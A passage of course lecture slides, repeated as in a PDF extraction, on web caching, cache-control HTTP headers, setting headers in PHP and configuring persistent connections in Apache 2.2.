I This presentation does not cover setting upa cache. Instead, it focuses on how to useexisting caches, that is browser and proxycaches.

55 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Types of Caches (Cont’d)

I The web server itself has a cache, seehttpd.apache.org/docs/2.2/caching.html for information oncaching with apache. Although this doesnot reduce network traffic, it might eliminatedatabase calls and PHP execution.

I This presentation does not cover setting upa cache. Instead, it focuses on how to useexisting caches, that is browser and proxycaches.

55 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Loaded From Cache?

I Caching policies varies, and can also beconfigured manually.

I Following is a (simplification of a) typicalmethod to decide if content shall be servedfrom cache, or if a request to the server isneeded.

56 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Loaded From Cache?

I Caching policies varies, and can also beconfigured manually.

I Following is a (simplification of a) typicalmethod to decide if content shall be servedfrom cache, or if a request to the server isneeded.

56 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Loaded From Cache?(Cont’d)

1. Nothing is cached if a do-not-cache responseheader is set.

2. Nothing is cached if https is used.

3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.

4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.

5. Nothing is delivered from cache if bullets 3 and 4 fail.

57 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Loaded From Cache?(Cont’d)

1. Nothing is cached if a do-not-cache responseheader is set.

2. Nothing is cached if https is used.

3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.

4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.

5. Nothing is delivered from cache if bullets 3 and 4 fail.

57 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Loaded From Cache?(Cont’d)

1. Nothing is cached if a do-not-cache responseheader is set.

2. Nothing is cached if https is used.

3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.

4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.

5. Nothing is delivered from cache if bullets 3 and 4 fail.

57 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Loaded From Cache?(Cont’d)

1. Nothing is cached if a do-not-cache responseheader is set.

2. Nothing is cached if https is used.

3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.

4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.

5. Nothing is delivered from cache if bullets 3 and 4 fail.

57 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Loaded From Cache?(Cont’d)

1. Nothing is cached if a do-not-cache responseheader is set.

2. Nothing is cached if https is used.

3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.

4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.

5. Nothing is delivered from cache if bullets 3 and 4 fail.

57 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

How to Control Caches

I HTTP headers are the preferred way toprovide cache control.

I HTML meta tags can also be used, butmany caches do not open the HTMLdocument, and thereby miss them.

I Yet another alternative is Pragma HTTPheaders, but they are not part of the HTTPspecification, and thus often not consideredby caches.

58 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

How to Control Caches

I HTTP headers are the preferred way toprovide cache control.

I HTML meta tags can also be used, butmany caches do not open the HTMLdocument, and thereby miss them.

I Yet another alternative is Pragma HTTPheaders, but they are not part of the HTTPspecification, and thus often not consideredby caches.

58 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

How to Control Caches

I HTTP headers are the preferred way toprovide cache control.

I HTML meta tags can also be used, butmany caches do not open the HTMLdocument, and thereby miss them.

I Yet another alternative is Pragma HTTPheaders, but they are not part of the HTTPspecification, and thus often not consideredby caches.

58 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP HeadersSome HTTP headers used for cache control:

I Expires specifies a time in the GMT timezone. After this time, the cache shall checkwith the server if the resource is updated.Expires: Thu, 02 Oct 2014 14:16:41 GMT

I Last-Modified Specifies the timewhen the resource was last modified.Last-Modified: Wed, 01 Oct 2014 08:34:51 GMT

I ETag A unique identifier generated by theserver and changed every time theresource changes.Etag: "a8104f-4c3-504585f9acfcd"

59 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP HeadersSome HTTP headers used for cache control:

I Expires specifies a time in the GMT timezone. After this time, the cache shall checkwith the server if the resource is updated.Expires: Thu, 02 Oct 2014 14:16:41 GMT

I Last-Modified Specifies the timewhen the resource was last modified.Last-Modified: Wed, 01 Oct 2014 08:34:51 GMT

I ETag A unique identifier generated by theserver and changed every time theresource changes.Etag: "a8104f-4c3-504585f9acfcd"

59 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP HeadersSome HTTP headers used for cache control:

I Expires specifies a time in the GMT timezone. After this time, the cache shall checkwith the server if the resource is updated.Expires: Thu, 02 Oct 2014 14:16:41 GMT

I Last-Modified Specifies the timewhen the resource was last modified.Last-Modified: Wed, 01 Oct 2014 08:34:51 GMT

I ETag A unique identifier generated by theserver and changed every time theresource changes.Etag: "a8104f-4c3-504585f9acfcd"

59 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP HeadersSome HTTP headers used for cache control:

I Expires specifies a time in the GMT timezone. After this time, the cache shall checkwith the server if the resource is updated.Expires: Thu, 02 Oct 2014 14:16:41 GMT

I Last-Modified Specifies the timewhen the resource was last modified.Last-Modified: Wed, 01 Oct 2014 08:34:51 GMT

I ETag A unique identifier generated by theserver and changed every time theresource changes.Etag: "a8104f-4c3-504585f9acfcd"

59 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP Headers(Cont’d)

I Cache-Control Can have multiplevalues, for example:

I max-age Specifies how many seconds theresource is considered fresh.

I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.

I no-store The resource shall never bestored in a cache.

I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.

Cache-Control: max-age=3600, must-revalidate

60 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP Headers(Cont’d)

I Cache-Control Can have multiplevalues, for example:

I max-age Specifies how many seconds theresource is considered fresh.

I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.

I no-store The resource shall never bestored in a cache.

I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.

Cache-Control: max-age=3600, must-revalidate

60 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP Headers(Cont’d)

I Cache-Control Can have multiplevalues, for example:

I max-age Specifies how many seconds theresource is considered fresh.

I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.

I no-store The resource shall never bestored in a cache.

I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.

Cache-Control: max-age=3600, must-revalidate

60 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP Headers(Cont’d)

I Cache-Control Can have multiplevalues, for example:

I max-age Specifies how many seconds theresource is considered fresh.

I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.

I no-store The resource shall never bestored in a cache.

I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.

Cache-Control: max-age=3600, must-revalidate

60 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP Headers(Cont’d)

I Cache-Control Can have multiplevalues, for example:

I max-age Specifies how many seconds theresource is considered fresh.

I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.

I no-store The resource shall never bestored in a cache.

I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.

Cache-Control: max-age=3600, must-revalidate

60 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cache-Related HTTP Headers(Cont’d)

I Cache-Control Can have multiplevalues, for example:

I max-age Specifies how many seconds theresource is considered fresh.

I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.

I no-store The resource shall never bestored in a cache.

I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.

Cache-Control: max-age=3600, must-revalidate

60 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

How to Set HTTP HeadersI The PHP header function sets HTTP

headers.header(’Expires: Thu, 02 Oct 2014 14:16:41 GMT’);

I Remember that headers precede content,header must be called before any actualoutput is sent.

I Cache related HTTP headers can be set bythe web server.

I This can be configured in the server’sconfiguration file, seehttps://httpd.apache.org/docs/2.2/mod/mod_expires.htmlfor the apache server.

61 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

How to Set HTTP HeadersI The PHP header function sets HTTP

headers.header(’Expires: Thu, 02 Oct 2014 14:16:41 GMT’);

I Remember that headers precede content,header must be called before any actualoutput is sent.

I Cache related HTTP headers can be set bythe web server.

I This can be configured in the server’sconfiguration file, seehttps://httpd.apache.org/docs/2.2/mod/mod_expires.htmlfor the apache server.

61 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

How to Set HTTP HeadersI The PHP header function sets HTTP

headers.header(’Expires: Thu, 02 Oct 2014 14:16:41 GMT’);

I Remember that headers precede content,header must be called before any actualoutput is sent.

I Cache related HTTP headers can be set bythe web server.

I This can be configured in the server’sconfiguration file, seehttps://httpd.apache.org/docs/2.2/mod/mod_expires.htmlfor the apache server.

61 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

How to Set HTTP HeadersI The PHP header function sets HTTP

headers.header(’Expires: Thu, 02 Oct 2014 14:16:41 GMT’);

I Remember that headers precede content,header must be called before any actualoutput is sent.

I Cache related HTTP headers can be set bythe web server.

I This can be configured in the server’sconfiguration file, seehttps://httpd.apache.org/docs/2.2/mod/mod_expires.htmlfor the apache server.

61 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Caching Tips

I Always use the same URL for the sameresource, since resources are identified byURL.

I Use a shared library of images and otherresources, so a resource is identified withthe same URL as often as possible.

I Use a long caching period for images andother resources that seldom change.

I Cache also resources that change often,but for a short period. Even caching oneminute helps reduce server load.

62 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Caching Tips

I Always use the same URL for the sameresource, since resources are identified byURL.

I Use a shared library of images and otherresources, so a resource is identified withthe same URL as often as possible.

I Use a long caching period for images andother resources that seldom change.

I Cache also resources that change often,but for a short period. Even caching oneminute helps reduce server load.

62 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Caching Tips

I Always use the same URL for the sameresource, since resources are identified byURL.

I Use a shared library of images and otherresources, so a resource is identified withthe same URL as often as possible.

I Use a long caching period for images andother resources that seldom change.

I Cache also resources that change often,but for a short period. Even caching oneminute helps reduce server load.

62 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Caching Tips

I Always use the same URL for the sameresource, since resources are identified byURL.

I Use a shared library of images and otherresources, so a resource is identified withthe same URL as often as possible.

I Use a long caching period for images andother resources that seldom change.

I Cache also resources that change often,but for a short period. Even caching oneminute helps reduce server load.

62 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Caching Tips (Cont’d)

I When deciding caching periods, considerwhen the cached resource must beupdated, not how often it changes. It mightbe perfectly OK to show an old version for alimited amount of time.

I Don’t change files unless really needed,since that will change the last modifiedtimestamp.

I Output of PHP programs can be cached ifthe output only depends on the URL.Remember to set appropriate headers.

63 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Caching Tips (Cont’d)

I When deciding caching periods, considerwhen the cached resource must beupdated, not how often it changes. It mightbe perfectly OK to show an old version for alimited amount of time.

I Don’t change files unless really needed,since that will change the last modifiedtimestamp.

I Output of PHP programs can be cached ifthe output only depends on the URL.Remember to set appropriate headers.

63 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Caching Tips (Cont’d)

I When deciding caching periods, considerwhen the cached resource must beupdated, not how often it changes. It mightbe perfectly OK to show an old version for alimited amount of time.

I Don’t change files unless really needed,since that will change the last modifiedtimestamp.

I Output of PHP programs can be cached ifthe output only depends on the URL.Remember to set appropriate headers.

63 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Evaluating Response Headers

I HTTP response headers can be evaluatedat http://redbot.org/. This worksonly for servers with a public IP address.

64 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SectionNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

65 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Persistent TCP Connections

I With HTTP 1.1, TCP connections are bydefault reused for multiple HTTP requests.

I This can improve response time andthroughput quite a lot, since it takes time toestablish a new connection.

I To enable this, the content-lengthheader must be set in the HTTP response,otherwise the client can not know when theresponse is delivered and the connection isfree to reuse.

66 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Persistent TCP Connections

I With HTTP 1.1, TCP connections are bydefault reused for multiple HTTP requests.

I This can improve response time andthroughput quite a lot, since it takes time toestablish a new connection.

I To enable this, the content-lengthheader must be set in the HTTP response,otherwise the client can not know when theresponse is delivered and the connection isfree to reuse.

66 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Persistent TCP Connections

I With HTTP 1.1, TCP connections are bydefault reused for multiple HTTP requests.

I This can improve response time andthroughput quite a lot, since it takes time toestablish a new connection.

I To enable this, the content-lengthheader must be set in the HTTP response,otherwise the client can not know when theresponse is delivered and the connection isfree to reuse.

66 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Configuring PersistentConnections

I By default, the Apache 2.2 server usespersistent connections that are closed after15 seconds of inactivity.

I Persistent connections are turned on byspecifying KeepAlive On is theconfiguration file. This is also the defaultvalue.

I The timeout period is configured with theKeepAliveTimeout directive,KeepAliveTimeout 60 specifies thatconnections that are closed after 60seconds of inactivity.

67 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Configuring PersistentConnections

I By default, the Apache 2.2 server usespersistent connections that are closed after15 seconds of inactivity.

I Persistent connections are turned on byspecifying KeepAlive On is theconfiguration file. This is also the defaultvalue.

I The timeout period is configured with theKeepAliveTimeout directive,KeepAliveTimeout 60 specifies thatconnections that are closed after 60seconds of inactivity.

67 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Configuring PersistentConnections

I By default, the Apache 2.2 server usespersistent connections that are closed after15 seconds of inactivity.

I Persistent connections are turned on byspecifying KeepAlive On is theconfiguration file. This is also the defaultvalue.

I The timeout period is configured with theKeepAliveTimeout directive,KeepAliveTimeout 60 specifies thatconnections that are closed after 60seconds of inactivity.

67 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Configuring PersistentConnections (Cont’d)

I A longer timeout period normally improvesperformance if there are few concurrentrequests.

I With many concurrent requests,performance is worsened with a longtimeout, since the server uses too muchresources for all open connections.

I The max number of concurrently servedrequests can be configured with theMaxClients directive, default is 256.

I Note that this does not limit the number ofopen connections.

68 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Configuring PersistentConnections (Cont’d)

I A longer timeout period normally improvesperformance if there are few concurrentrequests.

I With many concurrent requests,performance is worsened with a longtimeout, since the server uses too muchresources for all open connections.

I The max number of concurrently servedrequests can be configured with theMaxClients directive, default is 256.

I Note that this does not limit the number ofopen connections.

68 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Configuring PersistentConnections (Cont’d)

I A longer timeout period normally improvesperformance if there are few concurrentrequests.

I With many concurrent requests,performance is worsened with a longtimeout, since the server uses too muchresources for all open connections.

I The max number of concurrently servedrequests can be configured with theMaxClients directive, default is 256.

I Note that this does not limit the number ofopen connections.

68 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Configuring PersistentConnections (Cont’d)

I A longer timeout period normally improvesperformance if there are few concurrentrequests.

I With many concurrent requests,performance is worsened with a longtimeout, since the server uses too muchresources for all open connections.

I The max number of concurrently servedrequests can be configured with theMaxClients directive, default is 256.

I Note that this does not limit the number ofopen connections.

68 / 68